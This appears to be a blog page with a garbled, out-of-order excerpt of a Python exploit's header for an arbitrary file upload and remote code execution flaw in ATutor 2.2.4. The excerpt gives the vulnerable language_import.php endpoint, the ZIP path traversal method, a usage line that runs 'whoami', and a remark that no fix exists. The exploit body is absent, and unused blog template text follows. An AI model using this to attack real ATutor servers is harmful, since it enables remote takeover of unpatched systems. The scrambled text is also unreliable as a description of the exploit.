# Note: This was successfully tested against a windows install however it should work with linux. "Referer": " + target + "/ATutor/mods/_core/languages/language_import.php", Print "- Example: %s admin mypassword 'whoami'" % sys.argv Print "- Discovery / PoC by liquidsky (JMcPeters) ^^" Print "- ATutor 2.2.4 Arbitrary File Upload / RCE " # Notes: This application is no longer being maintained so there is no fix for this issue. # resulting in remote code execution via a "." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component. # Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal # Tested on: Windows 8 / Apache / MySQL (XAMPP) # Exploit Author: liquidsky (JM #!/usr/bin/env python # Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE ATutor 2.2.4 Arbitrary File Upload Command Execution
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |